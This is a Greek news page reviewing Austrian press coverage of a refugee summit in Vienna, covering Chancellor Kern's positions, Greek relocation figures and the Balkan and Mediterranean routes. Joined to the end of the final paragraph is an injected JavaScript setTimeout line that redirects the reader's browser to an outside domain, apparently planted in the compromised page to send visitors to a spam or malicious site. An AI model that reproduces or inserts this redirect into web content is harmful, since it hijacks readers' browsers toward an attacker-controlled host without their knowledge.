Ο αυστριακός Τύπος για το προσφυγικό στη μίνι Σύνοδο της Βιέννης

0
6

 

Στο προσφυγικό ζήτημα αναφέρεται ο αυστριακός Τύπος με αφορμή τη Σύνοδο στη Βιέννη.

«Οι διενέξεις κατά μήκος της Διαδρομής των Βαλκανίων» είναι ο τίτλος της Die Presse, «Ο καγκελάριος Κερν εντείνει την πίεση για έλεγχο των εξωτερικών συνόρων της ΕΕ» της «Kurir», «Κορυφές της πολιτικής στη Σύνοδο Κορυφής για το Προσφυγικό στη Βιέννη» της Wiener Zeitung, ή «Το Συνέδριο της Βιέννης για την προσφυγική κρίση» της Cronen Zeitung.

H Die Presse πέρα από το ολοσέλιδο αφιέρωμα φιλοξενεί και σειρά δημοσιευμάτων στις εσωτερικές της σελίδες με τους τίτλους «Τα Βαλκάνια ενώπιον ενός προσφυγικού κύματος το φθινόπωρο», «Τί απέμεινε από τη Συμφωνία με την Τουρκία», «Το θανάσιμο πέρασμα από την Αίγυπτο προς την Ευρώπη», «Πρόσφυγες με καλό επίπεδο μόρφωσης«.

Η εφημερίδα υπογραμμίζει πως από τους 160.000 πρόσφυγες από Ελλάδα και Ιταλία, που είχε συμφωνηθεί με κατανεμηθούν σε άλλες χώρες-μέλη της ΕΕ, από την Ελλάδα έχουν μετεγκατασταθεί μόλις 4.140 πρόσφυγες κάτι που σημειώνει και η Kurir.

Η εφημερίδα κάνει ιδιαίτερη αναφορά στην κατάσταση των προσφύγων στην Ελλάδα σε δημοσίευμά της με τίτλο «Στην Ελλάδα αυξάνεται πάλι η ροή των προσφύγων», ενώ μεγάλες αναφορές στο κεντρικό δημοσίευμά της, γίνονται στις αυστριακές θέσεις και στα αυστριακά μέτρα για το προσφυγικό, ενώ παρατίθενται και οι θέσεις που διατύπωσαν ο Αυστριακός καγκελάριος και οι Αυστριακοί υπουργοί Εσωτερικών και Άμυνας, σε δημόσια συζήτηση που διοργάνωσε την Παρασκευή η εφημερίδα.

Η «Cronen Zeitung» αναφέρεται στη θέση του Αυστριακού καγκελάριου Κρίστιαν Κερν για την ανάγκη καταπολέμησης των μεταναστευτικών κινημάτων στις ρίζες τους και της επίδειξης αλληλεγγύης, όπως επίσης σε ένα είδος βοήθειας με ένα «Σχέδιο Μάρσαλ» για τις βορειοαφρικανικές χώρες, αλλά και τις ανησυχίες του για τη λεγόμενη Μεσογειακή Διαδρομή, καθώς «θα είναι ήδη αργά εάν το σταμάτημα των προσφύγων αρχίζει μόλις στο «Πέρασμα Μπρένερ» (στα ιταλο-αυστριακά σύνορα).

Η «Wiener Zeitung» παρατηρεί πως, σε αντίθεση με τη Διάσκεψη για τα Δυτικά Βαλκάνια που είχε πραγματοποιηθεί τον περασμένο Φεβρουάριο στη Βιέννη, οπότε και αποφασίστηκε το κλείσιμο του δυτικού διαδρόμου, τη φορά αυτή στο τραπέζι των συνομιλιών βρίσκεται ο Ελληνας πρωθυπουργός Αλέξης Τσίπρας, σημειώνοντας πως θέματα είναι η διασφάλιση των εξωτερικών συνόρων της ΕΕ και η επαναπροώθηση προσφύγων. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here